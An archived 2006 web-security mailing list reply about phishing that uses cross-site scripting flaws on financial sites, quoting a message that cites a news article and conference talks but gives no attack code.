[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] XSS-Phishing on Financial Sites (Tip of the iceberg)

From: "Ryan Barnett" <rcbarnett@xxxxxxxxx>
Subject: Re: [WEB SECURITY] XSS-Phishing on Financial Sites (Tip of the iceberg)
Date: Fri, 23 Jun 2006 14:27:00 -0400

------=_Part_35983_19123118.1151087220212
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Too funny.  Maybe someone should inform VIsa of the PCI security standard
and have one of the authorized scanning vendors check their site for common
web application security issues such as XSS...

*Sed quis custodiet ipsos custodies.*
*"But who is watching the watchers?"*

-- 
Ryan C. Barnett
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
Author: Preventing Web Attacks with Apache

On 6/23/06, Jeremiah Grossman <jeremiah@whitehatsec.com> wrote:
>
> On the heals of the Paypal-XSS Phishing article...
>
> Robert Auger (cgisecurity.com) pointed me to another timely article
> about Phishing attacks using XSS vulnerabilities [1]. The reporter
> does a good job of describing the finer details (with screenshots) on
> why the technique is so effective. The reporter even called out
> Visa.com, JPMorganChase.com, eBay, Nasdaq.com, BankofAmerica.com,
> American Express, Barclays, Microsoft.com as having XSS (details
> withheld).  Unsurprising since we know just about every website out
> there has XSS. These are same techniques I described during last
> years Black Hat presentation "Phishing with Superbait" [2] and we can
> expect a lot more of the same in the coming year.
>
> While Phishing is one possible angle to XSS, new avenues of attack
> are emerging that are increasingly similar to the general
> capabilities of todays malware. Threats far more dangerous than we
> originally anticipated when we began researching XSS years ago. For
> instance when you visit a website (even a trusted website) the page
> port scans your network and reconfigures your DSL/Router from the
> inside. This will be the subject matter my talk this year at BH
> "Hacking Intranet Websites from the Outside".
>
> I think it was Bruce Schneier who said attacks always get better,
> never worse. The same holds true here.
>
>
> [1] Flaws in Financial Sites Aid Scammers
> http://blog.washingtonpost.com/securityfix/2006/06/
> flaws_in_financial_sites_aid_s.html
>
> [2] Phishing with Superbait
> http://www.whitehatsec.com/presentations/phishing_superbait.pdf
>
>
> Regards,
>
> Jeremiah Grossman
> Founder and CTO
> WhiteHat Security, Inc.
> www.whitehatsec.com
>
>
>
>
>
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>

------=_Part_35983_19123118.1151087220212
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

<div>Too funny.&nbsp; Maybe someone should inform VIsa of the PCI security standard and have one of the authorized scanning vendors check their site for common web application security issues such as XSS...</div>
<div>&nbsp;</div>
<div><em>Sed quis custodiet ipsos custodies.</em></div>
<div><em>&quot;But who is watching the watchers?&quot;</em></div>
<div><br>-- <br>Ryan C. Barnett<br>Web Application Security Consortium (WASC) Member<br>CIS Apache Benchmark Project Lead<br>SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC<br>Author: Preventing Web Attacks with Apache 
<br><br>&nbsp;</div>
<div><span class="gmail_quote">On 6/23/06, <b class="gmail_sendername">Jeremiah Grossman</b> &lt;<a href="mailto:jeremiah@whitehatsec.com";>jeremiah@whitehatsec.com</a>&gt; wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">On the heals of the Paypal-XSS Phishing article...<br><br>Robert Auger (<a href="http://cgisecurity.com";>cgisecurity.com
</a>) pointed me to another timely article<br>about Phishing attacks using XSS vulnerabilities [1]. The reporter<br>does a good job of describing the finer details (with screenshots) on<br>why the technique is so effective. The reporter even called out
<br><a href="http://Visa.com";>Visa.com</a>, JPMorganChase.com, eBay, <a href="http://Nasdaq.com";>Nasdaq.com</a>, BankofAmerica.com,<br>American Express, Barclays, <a href="http://Microsoft.com";>Microsoft.com</a> as having XSS (details
<br>withheld).&nbsp;&nbsp;Unsurprising since we know just about every website out<br>there has XSS. These are same techniques I described during last<br>years Black Hat presentation &quot;Phishing with Superbait&quot; [2] and we can
<br>expect a lot more of the same in the coming year.<br><br>While Phishing is one possible angle to XSS, new avenues of attack<br>are emerging that are increasingly similar to the general<br>capabilities of todays malware. Threats far more dangerous than we
<br>originally anticipated when we began researching XSS years ago. For<br>instance when you visit a website (even a trusted website) the page<br>port scans your network and reconfigures your DSL/Router from the<br>inside. This will be the subject matter my talk this year at BH
<br>&quot;Hacking Intranet Websites from the Outside&quot;.<br><br>I think it was Bruce Schneier who said attacks always get better,<br>never worse. The same holds true here.<br><br><br>[1] Flaws in Financial Sites Aid Scammers
<br><a href="http://blog.washingtonpost.com/securityfix/2006/06/";>http://blog.washingtonpost.com/securityfix/2006/06/</a><br>flaws_in_financial_sites_aid_s.html<br><br>[2] Phishing with Superbait<br><a href="http://www.whitehatsec.com/presentations/phishing_superbait.pdf";>
http://www.whitehatsec.com/presentations/phishing_superbait.pdf</a><br><br><br>Regards,<br><br>Jeremiah Grossman<br>Founder and CTO<br>WhiteHat Security, Inc.<br><a href="http://www.whitehatsec.com";>www.whitehatsec.com</a>
<br><br><br><br><br>----------------------------------------------------------------------------<br>The Web Security Mailing List:<br><a href="http://www.webappsec.org/lists/websecurity/";>http://www.webappsec.org/lists/websecurity/
</a><br><br>The Web Security Mailing List Archives:<br><a href="http://www.webappsec.org/lists/websecurity/archive/";>http://www.webappsec.org/lists/websecurity/archive/</a><br><a href="http://www.webappsec.org/rss/websecurity.rss";>
http://www.webappsec.org/rss/websecurity.rss</a> [RSS Feed]<br><br></blockquote></div><br><br clear="all">

------=_Part_35983_19123118.1151087220212--

References:
- [WEB SECURITY] XSS-Phishing on Financial Sites (Tip of the iceberg)
  - From: Jeremiah Grossman

Prev by Date: [WEB SECURITY] XSS-Phishing on Financial Sites (Tip of the iceberg)
Next by Date: [WEB SECURITY] Article on XSS
Previous by thread: [WEB SECURITY] XSS-Phishing on Financial Sites (Tip of the iceberg)
Next by thread: [WEB SECURITY] RE: XSS-Phishing on Financial Sites (Tip of the iceberg)
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site